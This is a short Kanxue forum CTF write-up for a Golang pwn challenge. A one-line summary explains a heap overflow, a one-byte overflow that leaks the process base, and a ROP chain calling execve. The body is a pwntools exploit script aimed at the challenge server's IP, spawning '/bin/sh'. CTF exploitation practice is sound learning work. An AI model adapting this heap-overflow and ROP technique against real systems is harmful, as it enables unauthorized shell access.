[原创]挖宝WP-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

koocola

2019-3-23 14:02

2321

golang pwn

堆溢出任意地址分配到retn附近，单字节溢出读到process base并能再次ROP，再次调用syscalll的ROP调用execve getshell

from pwn import *

def write_a(content):

f.sendlineafter(">>","a")

f.sendlineafter(">>","d")

f.sendlineafter(">>",content.ljust(48,'\x00')+p64(addr))

#f=process("./trepwn",env={'LD_PRELOAD':'./libc.so'})

f=remote("211.159.175.39",8787)

f.sendlineafter("name :","koocola")

for i in range(5):

f.sendlineafter(">>","d")

#gdb.attach(proc.pidof(f)[0],"b* 0x555555554000+0xd72d6")

#f.sendlineafter(">>","\x00"*48+p64(0xc82003fcd0))

f.sendlineafter(">>","\x00"*48+p64(0xc82003fcd0+0x2000))

write_a("\x48"*17)

f.recvuntil("journey!\n")

f.recv(16)

#f.recvuntil("message: ")

base_addr=u64(f.recv(6).ljust(8,'\0'))-0xd744d

success("process base :"+hex(base_addr))

#payload="m"*0x10+p64(base_addr+0x186600)+p64(59)+p64(0xc82003fcd0+0x2000+0x40)+p64(0)+p64(0)+"/bin/sh\0"

payload="m"*0x10+p64(base_addr+0x18557c)+p64(59)+p64(0xc82003fcd0+0x2000+0x38)+p64(0)+p64(0)+"/bin/sh\0"

f.sendlineafter(">>",payload)

f.interactive()

收藏・0

点赞・1

打赏